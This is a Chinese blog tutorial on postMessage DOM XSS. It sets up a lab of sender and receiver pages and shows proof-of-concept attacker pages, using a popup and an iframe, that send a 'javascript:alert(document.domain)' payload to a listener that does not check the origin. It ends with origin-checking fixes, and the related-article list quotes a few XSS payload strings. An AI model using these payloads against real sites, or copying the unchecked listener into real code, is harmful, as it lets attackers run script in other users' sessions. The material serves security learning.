PostMessage xss学习和挖掘

最新推荐文章于 2024-11-18 20:41:54 发布
最新推荐文章于 2024-11-18 20:41:54 发布
阅读量71 收藏
点赞数
文章标签: xss 学习 前端 python java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43174984/article/details/137299887
版权

  PostMessage xss很有趣,在国外出现了很多次,国内src/众测从没遇到过,挖到过。可能境界还不够,有机会再去试试。好几年前记得心血来潮学过一次,都是半知半解,后来因为重要性不高,不了了之了,今天重新捡起来。

  PostMessage的含义:参考MDN:

Window.postmessage()方法可以安全地实现Window对象之间的跨源通信;例如,在页面和它派生的弹出窗口之间,或者在页面和其内嵌的iframe之间。

  简单点来说,我是这样理解的:发送相应数据到目标页面,目标页面接收传输的数据并进行处理。

  具体理论详情参考:https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage

  废话不多说,先准备环境:一台闲置vps:

   搭建两个环境页面:

    demo1.html:代发送数据的页面:

<!DOCTYPE html>
<html>
<head>
    <title></title>
 <meta charset="utf-8" />
<script>
function openChild() {
    child = window.open('demo2.html', 'popup', 'height=300px, width=500px');
}
function sendMessage(){
    //发送的数据内容
    let msg={pName : "jack", pAge: "12"};
    //发送消息数据数据到任意目标源, *指的是任意anyone
    child.postMessage(msg,'*');
}
</script>
</head>
<body>
    <form>
        <fieldset>
            <input type='button' id='btnopen' value='Open child' onclick='openChild();' />
            <input type='button' id='btnSendMsg' value='Send Message' onclick='sendMessage();' />
        </fieldset>
    </form>
</body>
</html>

demo2.html:代监听发送的数据,接收消息数据页面:

<!DOCTYPE html>
<html>
<head>
    <title></title>
    <meta charset="utf-8" />
    <script>
        //添加事件监控消息
    window.addEventListener("message", (event)=>{
        let txt=document.getElementById("msg");
        //接收传输过来的变量数据
        txt.value=`Name is ${event.data.pName} Age is  ${event.data.pAge}` ;

    });
    </script>
</head>
<body>
    <form>
        <h1>postMessage学习</h1>
        <input type='text' id='msg'/>
    </form>
</body>
</html>

  访问:http://119.45.227.86/postmessage/demo1.html

  

第二步:f12子窗口,找到监听代码:

  

然后选择主窗口,点击Send Messsage:

  查看子窗口,接收数据成功:

    

  这样我们就完成了一次:发送数据->接收数据的一个过程

  了解了基础的使用,下面是关于PostMessgae XSS的安全隐患:

  (1):数据伪造:

   因为发送数据中,使用的是*,并没有限制目标源,导致可以通过任意地址给http://119.45.227.86/postmessage/demo2.html发送数据:

   attacker.html:

<!DOCTYPE html>
<html>
<head>
    <title></title>
 <meta charset="utf-8" />
<script>
childwin = window.open('http://119.45.227.86/postmessage/demo2.html');

function sendMessage(){
    let msg={pName : "attacker", pAge: "16"};
    childwin.postMessage(msg,'*')
}

(function(){setTimeout("sendMessage()",1000);}()); 
</script>
</head>
</html>

 直接本地localhost(模拟攻击者vps)访问:

  

发现通过攻击者vps成功修改了传输过去的数据,原来是

Name is jack Age is  12

 后被更改成:

Name is attacker Age is  16

 (2)接收处的处理不当导致的dom xss:

  测试环境:http://119.45.227.86/postmessage/xss.html

<!DOCTYPE html>
<html>
<head>
    <title></title>
    <meta charset="utf-8" />
    <script>
    window.addEventListener("message", (event)=>{
        location.href=`${event.data.url}`;
    });
    </script>
</head>
</html>

location.href="数据",这里可控,可以url跳转,也可以xss 

    利用poc:

<!DOCTYPE html>
<html>
<head>
    <title></title>
 <meta charset="utf-8" />
<script>
childwin = window.open('http://119.45.227.86/postmessage/xss.html');

function sendMessage(){
    let msg={url:"javascript:alert(document.domain)"};
    childwin.postMessage(msg,'*')
}

(function(){setTimeout("sendMessage()",1000);}()); 
</script>
</head>
</html>

   本地访问跳转即触发xss:    

  利用成功。利用poc2:

<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body>
    <iframe name="test" src="http://119.45.227.86/postmessage/xss.html" onload="xss()"></iframe>
</body>
<script type="text/javascript">
    var iframe = window.frames.test

    function xss(){
        let msg={"url":"javascript:alert(document.domain)"};
        iframe.postMessage(msg,'*');
    }
</script>
</html

  本地访问:

  直接打开即触发xss:

  

   修复缓解方案:

    发送消息数据测试代码,限制目标源为指定发送:

    demo1.html:

<!DOCTYPE html>
<html>
<head>
    <title></title>
 <meta charset="utf-8" />
<script>
childwin = window.open('http://119.45.227.86/postmessage/xss_renovate.html');

function sendMessage(){
    let msg={url:"javascript:alert(document.domain)"};
    childwin.postMessage(msg,'http://119.45.227.86/postmessage/xss_renovate.html')
}

(function(){setTimeout("sendMessage()",1000);}()); 
</script>
</head>
</html>

    接收方测试代码:http://119.45.227.86/postmessage/xss_renovate.html

<!DOCTYPE html>
<html>
<head>
    <title></title>
    <meta charset="utf-8" />
    <script>
        window.addEventListener("message", (event)=>{
            if (event.origin !== "http://119.45.227.86"){
                return;
            }
         location.href=`${event.data.url}`;
        });
    </script>
</head>
<body>
   
</body>
</html>

  再次访问本地demo1.html,没有弹窗xss了

 

  1.限制发送目标,禁止使用*

  2.限制接收数据event.origin,使用指定信任域

玲珑安全
关注
【网络安全】PostMessage:分析JS实现XSS
等风来
07-17 1442
PostMessage是一个用于在网页间安全地发送消息的浏览器 API。它允许不同的窗口(例如,来自同一域名下的不同页面或者不同域名下的跨域页面)进行通信,而无需通过服务器。通常情况下,它用于实现跨文档消息传递(Cross-Document Messaging),这在一些复杂的网页应用和浏览器插件中非常有用。
postmessage xss利用
2401_84466336的博客
05-27 888
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。假如我们可控origin,后面也会调用jquery中对象的text()方法,这个方法是自带有实体化编码的,所以就算绕过了也利用不了。刚才我们的举例,其实是相当于伪造了发送端,然后目标为接收端,接收端对数据没有正确处理,从而导致了XSS漏洞。前面说了,出现XSS,是因为window对发送的数据处理不当造成的,咱们分析一下这里的接收数据页面。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料。
渗透测试-postmessage xss
cdyunaq的博客
04-02 5816
介绍 看国外好多这种漏洞,刚好挖掘某 SRC 的时候也发现了类似的点,所以觉得还是有必要记录一下 介绍 postMessage()方法用于安全地实现跨源通信。 参考 1:https://www.runoob.com/js/met-win-postmessage.html 参考 2:https://developer.mozilla.org/zh-CN/docs/Web/API/Window/postMessage 语法 我感觉就是给数据发送到 window 中,就这么简单。 ..
postMessage引发XSS
weixin_52501704的博客
05-27 1510
这次的主题是postMessage未验证消息来源origin,导致恶意代码注入的dom-xss,由于很少人关注这类型的注入,因为挖掘难度中等,需要一定的javascript代码审计能力,且漏洞危害等级不高,导致国内许多SRC都存在跨域消息传输xss注入漏洞。漏洞防护也比较简单,一般都是验证消息来源的origin,比如a.com的源码中只接收b.com的消息,不是b.com发来的消息不进行任何处理。但是请记住一点,插件只是辅助,并不能直接找到漏洞,漏洞的挖掘还是得需要去审计javascript代码。
iframe跨域消息通信(postMessage和message事件)
一个做过前端开发的产品经理,经历过睿智产品的折磨导致脱发之后,励志要翻身"农奴"把歌唱,一边打入敌人内部一边持续提升自己,为我们广大开发同胞谋福祉,坚决抵制睿智产品折磨我们码农兄弟!
08-08 2032
在现代Web开发中,跨域通信是一个常见的需求,尤其是在涉及多个子域或第三方服务的情况下。和message事件是实现跨域通信的一种有效方式。本文将详细介绍如何利用这两种技术来进行iframe与父窗口之间的消息通信,并提供丰富的示例代码和实践技巧。
Dom Xss挖掘思路
qq_43936524的博客
03-15 946
文章目录常见场景url带入页面跳转类缓存类postMessagewindow.name优势防御手段Dom xss靶场 常见场景 url带入页面 // url获得用户输入 var r = window.location.search.substr(1).match(reg); // 将输入写入界面 document.getElementById('foo').innerHTML = getUrlParam('foo') 跳转类 location.href = urlparams.redirecturl;
【渗透测试】XSS手工挖掘到防御
ssrf
08-05 790
一、概述 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容 危害: 盗取管理员cookie XSS蠕虫 挂马(水坑攻击) 键盘记录等等。。。。。。 二、XSS分类 1
XSS知识总结
qq_43842093的博客
11-07 6835
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
XSS漏洞 深度解析 XSS_labs靶场
diaobusi的博客
12-12 604
XSS原名为Cross-site Sciprting(跨站脚本攻击),因简写与层叠样式表(Cascading style sheets)重名,为了区分所以取名为XSS。这个漏洞主要存在于HTML页面中进行动态渲染输出的参数中,利用了脚本语言和HTML语言的特性,将恶意的JavaScript脚本注入进HTMl页面,这些脚本可以窃取用户信息、会话令牌、修改页面内容等,从而达到攻击目的。
DOM-XSS漏洞的挖掘与攻击面延伸.pptx
10-15
* 使用 postMessage、window.name、localStorage 等攻击点进行 XSS 攻击。 * 使用 iframe src 属性 inject 恶意脚本,从而获取敏感信息。 4. DOM-XSS 漏洞的防御方法: * 对用户输入进行校验,从而避免恶意脚本...
DOM-XSS漏洞的挖掘与攻击面延伸.pdf
10-15
#### DOM-XSS挖掘与利用 **文档概述:** 本文档深入探讨了DOM-XSS(Document Object Model Cross-Site Scripting)漏洞的挖掘方法及其攻击面的延伸。DOM-XSS是一种特殊的XSS(Cross-Site Scripting)攻击类型,它...
Xss挑战(跨脚本攻击)
ming20211016的博客
11-13 1319
这里将script,on,src,data,href,进行了过滤,并且在尝试的时候关键字双写不能用了,那么这里直接选择不去闭合标签,直接使用伪协议,但是发现javascript也被拆开了,这里可以对伪协议中的字母进行转码。这里查看我们注入的代码是否有http://,如果包含则执行else中的语句,将我们构造的攻击代码输入到href中,如果不包含则在a标签中的href显示指定字符串。源码中将script,on,src,data,href标签及属性转换为空。
XSS】payload#1
weixin_43699371的博客
11-17 91
一些payload <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(2);</script> <script\x0Dtype="text/javascript">javascript:alert(3);</script> <script\x09type
跨站脚本攻击(XSS)的原理及防护措施
最新发布
乐闻世界
11-18 527
XSS攻击是一种常见但非常危险的网络攻击手段。理解其原理和危害,并采取适当的防护措施,可以有效地保护自己的网站和用户的安全。希望这篇文章能帮助你更好地理解和应对XSS攻击,为互联网的安全贡献一份力量。
学习】【css】元素的水平垂直居中
m0_61097007的博客
11-18 349
【代码】【学习】【css】元素的水平垂直居中。
EEG+EMG学习系列 (1) :一个基于小波的自动睡眠评分模型
走在深度学习前沿的小宋
11-14 933
由于手动睡眠阶段评分方法的限制,创建自动睡眠阶段分类的需求已经上升。在这项研究中,使用`双通道单极脑电图 (EEG)`、`下巴肌电图 (EMG)` 和`双通道眼电图 (EOG)` 信号开发了一种新的机器学习模型。使用`最佳正交滤波器组`,通过分解 30 s 信号纪元来获得子带。然后根据这些子带的系数计算 `Tsallis 熵`。然后,这些特征被馈送到一个`集成袋装树 (EBT) 分类器`,用于自动睡眠分类。
结合计算机知识学习英语四级词汇 P3(A11 ~ A15)(每次重点积累 5 个词汇)
weixin_52173250的博客
11-18 395
结合计算机知识学习英语四级词汇 P3(A11 ~ A15)(每次重点积累 5 个词汇)
Vue3学习:查询城市天气预报案例(vite,选项式)
wangyining070205的博客
11-13 830
前几日的学习中,实现了查询城市天气预报,是用组合式实现的,今天是用选项式来实现,案例运行效果如下: 如果不输入城市的名字,直接点击“查询”,将会显示IP所在地城市的天气预报。 代码如下: <template> <div id="container"> <div id="search"> <el-input v-model="cityName" placeholder="请输入城市名" class="inputText
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值